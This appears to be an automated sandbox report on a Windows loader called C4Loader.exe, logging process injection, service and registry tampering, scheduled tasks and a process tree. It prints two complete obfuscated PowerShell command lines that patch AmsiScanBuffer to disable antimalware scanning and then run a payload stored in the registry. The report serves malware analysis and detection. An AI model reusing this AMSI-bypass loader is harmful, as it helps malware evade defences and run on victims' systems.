Token: SeProfSingleProcessPrivilege | 2040 | powershell.exe
Token: SeIncBasePriorityPrivilege | 2040 | powershell.exe
Token: SeCreatePagefilePrivilege | 2040 | powershell.exe
Token: SeBackupPrivilege | 2040 | powershell.exe
Token: SeRestorePrivilege | 2040 | powershell.exe
Token: SeShutdownPrivilege | 2040 | powershell.exe
Token: SeDebugPrivilege | 2040 | powershell.exe
Token: SeSystemEnvironmentPrivilege | 2040 | powershell.exe
Token: SeRemoteShutdownPrivilege | 2040 | powershell.exe
Token: SeUndockPrivilege | 2040 | powershell.exe
Token: SeManageVolumePrivilege | 2040 | powershell.exe
Token: 33 | 2040 | powershell.exe
Token: 34 | 2040 | powershell.exe
Token: 35 | 2040 | powershell.exe
Token: 36 | 2040 | powershell.exe
Token: SeIncreaseQuotaPrivilege | 2040 | powershell.exe
Token: SeSecurityPrivilege | 2040 | powershell.exe
Token: SeTakeOwnershipPrivilege | 2040 | powershell.exe
Token: SeLoadDriverPrivilege | 2040 | powershell.exe
Token: SeSystemProfilePrivilege | 2040 | powershell.exe
Token: SeSystemtimePrivilege | 2040 | powershell.exe
Token: SeProfSingleProcessPrivilege | 2040 | powershell.exe
Token: SeIncBasePriorityPrivilege | 2040 | powershell.exe
Token: SeCreatePagefilePrivilege | 2040 | powershell.exe
Token: SeBackupPrivilege | 2040 | powershell.exe
Token: SeRestorePrivilege | 2040 | powershell.exe
Token: SeShutdownPrivilege | 2040 | powershell.exe
Token: SeDebugPrivilege | 2040 | powershell.exe
Token: SeSystemEnvironmentPrivilege | 2040 | powershell.exe
Token: SeRemoteShutdownPrivilege | 2040 | powershell.exe
Token: SeUndockPrivilege | 2040 | powershell.exe
Token: SeManageVolumePrivilege | 2040 | powershell.exe
Token: 33 | 2040 | powershell.exe
Token: 34 | 2040 | powershell.exe
Token: 35 | 2040 | powershell.exe
Token: 36 | 2040 | powershell.exe
Token: SeIncreaseQuotaPrivilege | 2040 | powershell.exe
Token: SeSecurityPrivilege | 2040 | powershell.exe
Token: SeTakeOwnershipPrivilege | 2040 | powershell.exe
Token: SeLoadDriverPrivilege | 2040 | powershell.exe
Token: SeSystemProfilePrivilege | 2040 | powershell.exe
Token: SeSystemtimePrivilege | 2040 | powershell.exe
Token: SeProfSingleProcessPrivilege | 2040 | powershell.exe
Token: SeIncBasePriorityPrivilege | 2040 | powershell.exe
Token: SeCreatePagefilePrivilege | 2040 | powershell.exe
Token: SeBackupPrivilege | 2040 | powershell.exe
Token: SeRestorePrivilege | 2040 | powershell.exe
Token: SeShutdownPrivilege | 2040 | powershell.exe
Token: SeDebugPrivilege | 2040 | powershell.exe
Token: SeSystemEnvironmentPrivilege | 2040 | powershell.exe
Token: SeRemoteShutdownPrivilege | 2040 | powershell.exe
Token: SeUndockPrivilege | 2040 | powershell.exe
Token: SeManageVolumePrivilege | 2040 | powershell.exe
Token: 33 | 2040 | powershell.exe
Token: 34 | 2040 | powershell.exe
Suspicious use of UnmapMainImage 2 IoCs
Processes: svchost.exe
pid | process
2680 | svchost.exe
2680 | svchost.exe
Suspicious use of WriteProcessMemory 64 IoCs
Processes: C4Loader.exe, vbc.exe, powershell.exe, cmd.exe, SmartDefRun.exe, new2.exe
description | pid | process | target process
PID 1064 wrote to memory of 4240 | 1064 | C4Loader.exe | vbc.exe
PID 1064 wrote to memory of 4240 | 1064 | C4Loader.exe | vbc.exe
PID 1064 wrote to memory of 4240 | 1064 | C4Loader.exe | vbc.exe
PID 1064 wrote to memory of 3900 | 1064 | C4Loader.exe | vbc.exe
PID 1064 wrote to memory of 3900 | 1064 | C4Loader.exe | vbc.exe
PID 1064 wrote to memory of 3900 | 1064 | C4Loader.exe | vbc.exe
PID 1064 wrote to memory of 3900 | 1064 | C4Loader.exe | vbc.exe
PID 1064 wrote to memory of 3900 | 1064 | C4Loader.exe | vbc.exe
PID 3900 wrote to memory of 4704 | 3900 | vbc.exe | powershell.exe
PID 3900 wrote to memory of 4704 | 3900 | vbc.exe | powershell.exe
PID 3900 wrote to memory of 4704 | 3900 | vbc.exe | powershell.exe
PID 4704 wrote to memory of 2212 | 4704 | powershell.exe | C4Loader.exe
PID 4704 wrote to memory of 2212 | 4704 | powershell.exe | C4Loader.exe
PID 4704 wrote to memory of 2212 | 4704 | powershell.exe | C4Loader.exe
PID 4704 wrote to memory of 5004 | 4704 | powershell.exe | new2.exe
PID 4704 wrote to memory of 5004 | 4704 | powershell.exe | new2.exe
PID 4704 wrote to memory of 5004 | 4704 | powershell.exe | new2.exe
PID 4704 wrote to memory of 3444 | 4704 | powershell.exe | SysApp.exe
PID 4704 wrote to memory of 3444 | 4704 | powershell.exe | SysApp.exe
PID 4704 wrote to memory of 3444 | 4704 | powershell.exe | SysApp.exe
PID 4704 wrote to memory of 2032 | 4704 | powershell.exe | SmartDefRun.exe
PID 4704 wrote to memory of 2032 | 4704 | powershell.exe | SmartDefRun.exe
PID 4160 wrote to memory of 3208 | 4160 | cmd.exe | sc.exe
PID 4160 wrote to memory of 3208 | 4160 | cmd.exe | sc.exe
PID 4160 wrote to memory of 4024 | 4160 | cmd.exe | sc.exe
PID 4160 wrote to memory of 4024 | 4160 | cmd.exe | sc.exe
PID 4160 wrote to memory of 5096 | 4160 | cmd.exe | sc.exe
PID 4160 wrote to memory of 5096 | 4160 | cmd.exe | sc.exe
PID 4160 wrote to memory of 1988 | 4160 | cmd.exe | sc.exe
PID 4160 wrote to memory of 1988 | 4160 | cmd.exe | sc.exe
PID 4160 wrote to memory of 4388 | 4160 | cmd.exe | sc.exe
PID 4160 wrote to memory of 4388 | 4160 | cmd.exe | sc.exe
PID 4160 wrote to memory of 2108 | 4160 | cmd.exe | reg.exe
PID 4160 wrote to memory of 2108 | 4160 | cmd.exe | reg.exe
PID 4160 wrote to memory of 4192 | 4160 | cmd.exe | reg.exe
PID 4160 wrote to memory of 4192 | 4160 | cmd.exe | reg.exe
PID 4160 wrote to memory of 4008 | 4160 | cmd.exe | reg.exe
PID 4160 wrote to memory of 4008 | 4160 | cmd.exe | reg.exe
PID 4160 wrote to memory of 4036 | 4160 | cmd.exe | reg.exe
PID 4160 wrote to memory of 4036 | 4160 | cmd.exe | reg.exe
PID 4160 wrote to memory of 4888 | 4160 | cmd.exe | reg.exe
PID 4160 wrote to memory of 4888 | 4160 | cmd.exe | reg.exe
PID 2032 wrote to memory of 2436 | 2032 | SmartDefRun.exe | dialer.exe
PID 3744 wrote to memory of 4912 | 3744 | powershell.exe | schtasks.exe
PID 3744 wrote to memory of 4912 | 3744 | powershell.exe | schtasks.exe
PID 5004 wrote to memory of 4460 | 5004 | new2.exe | vbc.exe
PID 5004 wrote to memory of 4460 | 5004 | new2.exe | vbc.exe
PID 5004 wrote to memory of 4460 | 5004 | new2.exe | vbc.exe
PID 5004 wrote to memory of 4460 | 5004 | new2.exe | vbc.exe
PID 5004 wrote to memory of 4460 | 5004 | new2.exe | vbc.exe
PID 3684 wrote to memory of 4608 | 3684 | cmd.exe | sc.exe
PID 3684 wrote to memory of 4608 | 3684 | cmd.exe | sc.exe
PID 3684 wrote to memory of 5036 | 3684 | cmd.exe | sc.exe
PID 3684 wrote to memory of 5036 | 3684 | cmd.exe | sc.exe
PID 3684 wrote to memory of 3212 | 3684 | cmd.exe | sc.exe
PID 3684 wrote to memory of 3212 | 3684 | cmd.exe | sc.exe
PID 3684 wrote to memory of 1492 | 3684 | cmd.exe | sc.exe
PID 3684 wrote to memory of 1492 | 3684 | cmd.exe | sc.exe
PID 3684 wrote to memory of 3728 | 3684 | cmd.exe | sc.exe
PID 3684 wrote to memory of 3728 | 3684 | cmd.exe | sc.exe
PID 3684 wrote to memory of 856 | 3684 | cmd.exe | reg.exe
PID 3684 wrote to memory of 856 | 3684 | cmd.exe | reg.exe
PID 3684 wrote to memory of 3920 | 3684 | cmd.exe | reg.exe
PID 3684 wrote to memory of 3920 | 3684 | cmd.exe | reg.exe
Processes
(format: [tree depth] image path | cmdline: command line; behaviour tags are listed beneath each process)
- [1] C:\Windows\system32\lsass.exe | cmdline: C:\Windows\system32\lsass.exe
- [1] C:\Windows\system32\winlogon.exe | cmdline: winlogon.exe
- [2] C:\Windows\system32\dwm.exe | cmdline: "dwm.exe"
- [2] C:\Windows\System32\dllhost.exe | cmdline: C:\Windows\System32\dllhost.exe /Processid:{1ee42a25-dfb2-4380-9e6d-c30f0e6a2b42}
- [1] C:\Windows\system32\svchost.exe | cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
- [1] C:\Windows\System32\svchost.exe | cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
- [1] C:\Windows\System32\svchost.exe | cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
- [1] C:\Windows\system32\svchost.exe | cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
- [1] C:\Windows\system32\svchost.exe | cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
  - Drops file in System32 directory
- [2] C:\Windows\system32\taskhostw.exe | cmdline: taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:MfWwFyyyKWiB{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$zHZibhuwBaEAeD,[Parameter(Position=1)][Type]$DrVFYBiSlv)$HTRYDBaviaf=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+'f'+'l'+[Char](101)+'c'+'t'+''+[Char](101)+''+[Char](100)+''+[Char](68)+'e'+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+[Char](77)+''+[Char](101)+''+'m'+''+'o'+''+'r'+''+[Char](121)+''+'M'+''+'o'+'d'+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+'D'+[Char](101)+''+'l'+'e'+'g'+''+'a'+'t'+[Char](101)+''+'T'+''+[Char](121)+'p'+[Char](101)+'',''+[Char](67)+''+'l'+''+[Char](97)+'ss,'+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+'i'+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+'e'+''+[Char](97)+''+[Char](108)+''+[Char](101)+''+[Char](100)+''+[Char](44)+''+'A'+''+[Char](110)+'s'+[Char](105)+''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+','+[Char](65)+'ut'+[Char](111)+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$HTRYDBaviaf.DefineConstructor('R'+'T'+''+[Char](83)+''+[Char](112)+'e'+[Char](99)+''+'i'+''+[Char](97)+'l'+[Char](78)+''+[Char](97)+''+'m'+'e'+','+''+[Char](72)+''+[Char](105)+''+'d'+'eBy'+[Char](83)+'ig'+[Char](44)+''+[Char](80)+''+[Char](117)+''+'b'+'li'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$zHZibhuwBaEAeD).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+'e'+','+[Char](77)+''+[Char](97)+'n'+[Char](97)+''+[Char](103)+'ed');$HTRYDBaviaf.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+'o'+'k'+''+[Char](101)+'',''+[Char](80)+''+'u'+'b'+[Char](108)+''+[Char
](105)+''+[Char](99)+','+[Char](72)+''+[Char](105)+'d'+[Char](101)+'B'+[Char](121)+''+[Char](83)+''+'i'+''+'g'+',N'+[Char](101)+''+'w'+''+[Char](83)+''+[Char](108)+''+[Char](111)+''+[Char](116)+''+[Char](44)+''+'V'+''+'i'+''+[Char](114)+''+'t'+''+[Char](117)+'a'+[Char](108)+'',$DrVFYBiSlv,$zHZibhuwBaEAeD).SetImplementationFlags('Ru'+'n'+'ti'+[Char](109)+'e'+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+'a'+''+[Char](103)+''+'e'+'d');Write-Output $HTRYDBaviaf.CreateType();}$ATCLPXScUcuCY=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+'s'+''+'t'+''+'e'+''+'m'+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+'l'+'')}).GetType('M'+'i'+''+[Char](99)+''+[Char](114)+''+[Char](111)+''+[Char](115)+'o'+'f'+'t'+[Char](46)+'W'+[Char](105)+''+'n'+'3'+'2'+''+[Char](46)+''+[Char](85)+'n'+'s'+''+[Char](97)+'f'+[Char](101)+''+[Char](65)+'TC'+[Char](76)+''+'P'+''+[Char](88)+''+'S'+''+[Char](99)+'Uc'+'u'+''+'C'+''+[Char](89)+'');$vZpdetnudMNGIS=$ATCLPXScUcuCY.GetMethod('v'+[Char](90)+''+[Char](112)+'d'+[Char](101)+'t'+[Char](110)+''+[Char](117)+'d'+[Char](77)+''+[Char](78)+''+[Char](71)+'I'+[Char](83)+'',[Reflection.BindingFlags]''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+'i'+[Char](99)+''+','+''+[Char](83)+'t'+[Char](97)+''+'t'+''+'i'+''+[Char](99)+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$ONfjLIxNYCQvdjmfMyh=MfWwFyyyKWiB @([String])([IntPtr]);$wPDHzRhmTxOjZvPvlSmNOp=MfWwFyyyKWiB 
@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$bgtgIQDTfJl=$ATCLPXScUcuCY.GetMethod('GetM'+[Char](111)+''+'d'+''+[Char](117)+''+[Char](108)+'eH'+[Char](97)+''+[Char](110)+''+[Char](100)+''+[Char](108)+'e').Invoke($Null,@([Object]('kerne'+[Char](108)+''+'3'+''+[Char](50)+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'')));$MScikjDwUpGxHU=$vZpdetnudMNGIS.Invoke($Null,@([Object]$bgtgIQDTfJl,[Object]('L'+'o'+''+'a'+'d'+[Char](76)+''+[Char](105)+''+[Char](98)+'r'+[Char](97)+'r'+[Char](121)+''+'A'+'')));$VYKtGGiOLBdskzvmU=$vZpdetnudMNGIS.Invoke($Null,@([Object]$bgtgIQDTfJl,[Object](''+[Char](86)+''+[Char](105)+''+'r'+''+[Char](116)+'u'+[Char](97)+'l'+[Char](80)+'r'+[Char](111)+''+[Char](116)+''+[Char](101)+''+[Char](99)+''+'t'+'')));$qGjBlxM=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($MScikjDwUpGxHU,$ONfjLIxNYCQvdjmfMyh).Invoke(''+'a'+''+'m'+'s'+'i'+''+'.'+''+[Char](100)+''+[Char](108)+''+'l'+'');$oefKZObKxwRpdDMyV=$vZpdetnudMNGIS.Invoke($Null,@([Object]$qGjBlxM,[Object](''+[Char](65)+'m'+[Char](115)+''+[Char](105)+''+[Char](83)+''+'c'+''+'a'+'n'+'B'+''+'u'+''+'f'+''+[Char](102)+''+'e'+'r')));$MVPwtBqZAP=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VYKtGGiOLBdskzvmU,$wPDHzRhmTxOjZvPvlSmNOp).Invoke($oefKZObKxwRpdDMyV,[uint32]8,4,[ref]$MVPwtBqZAP);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$oefKZObKxwRpdDMyV,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VYKtGGiOLBdskzvmU,$wPDHzRhmTxOjZvPvlSmNOp).Invoke($oefKZObKxwRpdDMyV,[uint32]8,0x20,[ref]$MVPwtBqZAP);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+'F'+'T'+''+[Char](87)+''+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](100)+''+[Char](105)+''+'a'+''+[Char](108)+'e'+[Char](114)+''+[Char](115)+''+[Char](116)+''+'a'+'ger')).EntryPoint.Invoke($Null,$Null)2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
- [3] C:\Windows\System32\Conhost.exe | cmdline: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:HOEaShOrllle{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$bUdTXrDhNjcZSb,[Parameter(Position=1)][Type]$RhjoWytnXi)$dSDXjVHeSYI=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+'e'+'fl'+[Char](101)+''+[Char](99)+''+'t'+''+[Char](101)+''+'d'+''+'D'+''+'e'+'le'+[Char](103)+'a'+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+'n'+''+[Char](77)+''+[Char](101)+'m'+[Char](111)+'r'+[Char](121)+''+[Char](77)+''+'o'+'du'+'l'+'e',$False).DefineType(''+[Char](77)+''+'y'+''+'D'+''+[Char](101)+''+[Char](108)+'e'+[Char](103)+''+[Char](97)+''+[Char](116)+''+'e'+''+[Char](84)+''+[Char](121)+'p'+[Char](101)+'','Cl'+[Char](97)+''+[Char](115)+'s'+','+''+'P'+''+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+'c,'+[Char](83)+''+'e'+''+[Char](97)+''+[Char](108)+'e'+[Char](100)+''+','+''+[Char](65)+''+[Char](110)+'s'+'i'+''+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+','+[Char](65)+'u'+[Char](116)+'o'+[Char](67)+'l'+'a'+'s'+[Char](115)+'',[MulticastDelegate]);$dSDXjVHeSYI.DefineConstructor(''+[Char](82)+'T'+[Char](83)+''+[Char](112)+''+'e'+''+'c'+''+[Char](105)+'al'+[Char](78)+''+[Char](97)+''+'m'+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+'d'+'e'+[Char](66)+''+'y'+''+[Char](83)+''+'i'+''+[Char](103)+',P'+'u'+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$bUdTXrDhNjcZSb).SetImplementationFlags(''+'R'+''+'u'+'n'+[Char](116)+''+[Char](105)+'me'+[Char](44)+''+[Char](77)+''+[Char](97)+''+'n'+'ag'+'e'+''+[Char](100)+'');$dSDXjVHeSYI.DefineMethod(''+'I'+''+'n'+''+'v'+''+[Char](111)+''+[Char](107)+''+'e'+'','P'+[Char](117)+'b'+'l'+''+'i'+''+[Char](99)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+'e'+[Char](66)+''+[Char](121)+'S'+[Char](105)+''+'g'+''+[Char](44)+''+[Char](78)
+''+[Char](101)+''+[Char](119)+''+'S'+''+[Char](108)+'o'+'t'+''+[Char](44)+''+[Char](86)+''+[Char](105)+''+[Char](114)+''+'t'+'u'+[Char](97)+''+[Char](108)+'',$RhjoWytnXi,$bUdTXrDhNjcZSb).SetImplementationFlags(''+'R'+''+[Char](117)+'n'+[Char](116)+''+'i'+''+'m'+''+[Char](101)+','+'M'+''+[Char](97)+'nage'+'d'+'');Write-Output $dSDXjVHeSYI.CreateType();}$VGylFQOdagDXx=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+'ys'+[Char](116)+''+'e'+''+[Char](109)+'.'+[Char](100)+'l'+'l'+'')}).GetType(''+'M'+''+[Char](105)+''+[Char](99)+''+'r'+'oso'+[Char](102)+''+[Char](116)+''+[Char](46)+''+[Char](87)+'in3'+[Char](50)+''+'.'+''+[Char](85)+''+[Char](110)+''+'s'+'a'+'f'+''+'e'+''+'V'+''+'G'+''+'y'+''+[Char](108)+''+[Char](70)+''+'Q'+''+[Char](79)+''+[Char](100)+''+[Char](97)+''+'g'+'D'+'X'+'x');$sDHxRSkkYBnzNo=$VGylFQOdagDXx.GetMethod(''+[Char](115)+''+[Char](68)+''+[Char](72)+''+[Char](120)+''+'R'+''+'S'+''+[Char](107)+''+[Char](107)+''+'Y'+''+'B'+''+[Char](110)+''+'z'+'N'+'o'+'',[Reflection.BindingFlags]''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+','+[Char](83)+''+[Char](116)+''+[Char](97)+'t'+[Char](105)+'c',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$MmwzXVMtnPJtfuTpksy=HOEaShOrllle @([String])([IntPtr]);$NyJhiuAsSxXCPZFgtuiNXe=HOEaShOrllle 
@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$xqHvnoJMKfY=$VGylFQOdagDXx.GetMethod(''+[Char](71)+''+'e'+''+'t'+'Mo'+[Char](100)+''+'u'+'l'+[Char](101)+''+[Char](72)+''+'a'+''+[Char](110)+''+[Char](100)+'l'+'e'+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+'r'+[Char](110)+''+[Char](101)+'l'+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](100)+'l'+'l'+'')));$SHEEDTKkWSUJiu=$sDHxRSkkYBnzNo.Invoke($Null,@([Object]$xqHvnoJMKfY,[Object](''+[Char](76)+''+'o'+''+[Char](97)+''+[Char](100)+'Li'+'b'+''+'r'+''+'a'+'r'+[Char](121)+''+[Char](65)+'')));$GUhFGZTdkenyupiop=$sDHxRSkkYBnzNo.Invoke($Null,@([Object]$xqHvnoJMKfY,[Object](''+[Char](86)+''+'i'+'r'+[Char](116)+''+'u'+''+[Char](97)+'lP'+'r'+''+[Char](111)+''+[Char](116)+''+[Char](101)+''+[Char](99)+''+[Char](116)+'')));$aqienkl=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($SHEEDTKkWSUJiu,$MmwzXVMtnPJtfuTpksy).Invoke(''+[Char](97)+'ms'+[Char](105)+''+'.'+'d'+'l'+''+[Char](108)+'');$LcEyhilKAAGxfQDWm=$sDHxRSkkYBnzNo.Invoke($Null,@([Object]$aqienkl,[Object](''+'A'+''+[Char](109)+''+'s'+''+'i'+''+[Char](83)+'c'+[Char](97)+''+'n'+''+[Char](66)+'u'+[Char](102)+''+'f'+''+[Char](101)+''+[Char](114)+'')));$dGjmnDDzeS=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GUhFGZTdkenyupiop,$NyJhiuAsSxXCPZFgtuiNXe).Invoke($LcEyhilKAAGxfQDWm,[uint32]8,4,[ref]$dGjmnDDzeS);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$LcEyhilKAAGxfQDWm,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GUhFGZTdkenyupiop,$NyJhiuAsSxXCPZFgtuiNXe).Invoke($LcEyhilKAAGxfQDWm,[uint32]8,0x20,[ref]$dGjmnDDzeS);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+''+[Char](70)+''+'T'+''+'W'+'A'+[Char](82)+''+[Char](69)+'').GetValue(''+'d'+''+[Char](105)+''+'a'+''+[Char](108)+'e'+[Char](114)+'s'+'t'+'a'+'g'+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
- [3] C:\Windows\System32\Conhost.exe | cmdline: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
- [2] C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe | cmdline: "C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe"
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Drops file in Program Files directory
  - Suspicious behavior: EnumeratesProcesses
- [2] C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe | cmdline: C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
  - Executes dropped EXE
- [1] C:\Windows\system32\svchost.exe | cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
- [1] C:\Windows\system32\svchost.exe | cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
- [1] C:\Windows\system32\svchost.exe | cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
- [1] C:\Windows\System32\svchost.exe | cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
  - Drops file in System32 directory
- [1] C:\Windows\system32\svchost.exe | cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
- [2] C:\Windows\system32\sihost.exe | cmdline: sihost.exe
- [1] C:\Windows\System32\svchost.exe | cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
- [1] C:\Windows\system32\svchost.exe | cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
- [1] C:\Windows\system32\svchost.exe | cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
- [1] C:\Windows\system32\svchost.exe | cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
- [1] C:\Windows\system32\svchost.exe | cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
- [1] C:\Windows\System32\svchost.exe | cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
- [1] C:\Windows\system32\svchost.exe | cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache
- [1] C:\Windows\System32\svchost.exe | cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
- [1] C:\Windows\System32\svchost.exe | cmdline: C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
- [1] C:\Windows\System32\svchost.exe | cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
- [1] C:\Windows\system32\svchost.exe | cmdline: C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
- [1] C:\Windows\System32\svchost.exe | cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
- [1] C:\Windows\System32\svchost.exe | cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
- [1] C:\Windows\system32\svchost.exe | cmdline: C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
- [1] C:\Windows\System32\spoolsv.exe | cmdline: C:\Windows\System32\spoolsv.exe
- [1] C:\Windows\System32\svchost.exe | cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
- [1] C:\Windows\System32\svchost.exe | cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
- [1] C:\Windows\system32\svchost.exe | cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
- [1] C:\Windows\system32\svchost.exe | cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
- [1] C:\Windows\system32\svchost.exe | cmdline: C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
  - Suspicious use of UnmapMainImage
- [1] C:\Windows\System32\svchost.exe | cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
- [1] C:\Windows\system32\svchost.exe | cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
- [1] C:\Windows\system32\svchost.exe | cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
- [1] C:\Windows\Explorer.EXE | cmdline: C:\Windows\Explorer.EXE
- [2] C:\Users\Admin\AppData\Local\Temp\C4Loader.exe | cmdline: "C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
- [3] C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
- [3] C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
  - Suspicious use of WriteProcessMemory
- [4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
- [5] C:\Users\Admin\AppData\Local\Temp\C4Loader.exe | cmdline: "C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
- [5] C:\Users\Admin\AppData\Local\Temp\new2.exe | cmdline: "C:\Users\Admin\AppData\Local\Temp\new2.exe"
  - Executes dropped EXE
